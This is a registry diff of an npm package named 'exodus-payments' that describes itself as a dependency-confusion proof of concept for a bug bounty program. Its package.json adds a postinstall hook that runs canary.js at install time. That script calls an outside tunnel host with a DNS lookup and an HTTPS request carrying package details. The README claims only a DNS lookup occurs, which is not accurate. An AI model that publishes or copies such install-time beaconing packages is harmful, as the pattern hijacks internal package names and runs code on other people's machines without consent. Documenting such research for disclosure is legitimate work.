exodus-payments 99.0.0-canary.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +9 -0
- package/package.json +22 -0
- package/src/canary.js +7 -0
- package/src/index.js +5 -0
package/README.md
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
# Security Research Canary
|
|
2
|
+
|
|
3
|
+
This package (`exodus-payments`) is part of an authorized dependency confusion PoC
|
|
4
|
+
for the **Exodus HackerOne bug bounty program** (hackerone.com/exodus).
|
|
5
|
+
|
|
6
|
+
On `npm install`, this package performs a **single DNS lookup** to a canary server.
|
|
7
|
+
No data is collected or transmitted.
|
|
8
|
+
|
|
9
|
+
Will be unpublished/transferred upon report resolution.
|
package/package.json
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "exodus-payments",
|
|
3
|
+
"version": "99.0.0-canary.1",
|
|
4
|
+
"description": "Security research canary \u2014 Exodus HackerOne dependency confusion PoC. NOT a real package. Will be unpublished after verification.",
|
|
5
|
+
"main": "src/index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node src/canary.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"exodus",
|
|
11
|
+
"checkout",
|
|
12
|
+
"payments",
|
|
13
|
+
"security-research"
|
|
14
|
+
],
|
|
15
|
+
"author": "Security Researcher",
|
|
16
|
+
"license": "UNLICENSED",
|
|
17
|
+
"files": [
|
|
18
|
+
"src/",
|
|
19
|
+
"package.json",
|
|
20
|
+
"README.md"
|
|
21
|
+
]
|
|
22
|
+
}
|
package/src/canary.js
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
const dns = require('dns');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const HOST = '96e03fa6c292469a-172-245-86-254.serveousercontent.com';
|
|
4
|
+
const URL = 'https://' + HOST;
|
|
5
|
+
dns.lookup(HOST, () => {});
|
|
6
|
+
https.get(URL + '/canary-install?pkg=' + require('./package').name + '&ver=' + require('./package').version, (r) => r.resume()).on('error', () => {});
|
|
7
|
+
console.log('');
|
package/src/index.js
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
1
|
+
const err = () => { throw new Error('SECURITY RESEARCH CANARY. If installed by mistake: npm uninstall <pkg>. See docs.exodus.com for the real package.'); };
|
|
2
|
+
module.exports = {
|
|
3
|
+
generateMnemonicSigningKeys: err, signDirectPaymentMultiChain: err,
|
|
4
|
+
signCapture: err, signRefund: err, signCharge: err, signCancelSubscription: err,
|
|
5
|
+
};
|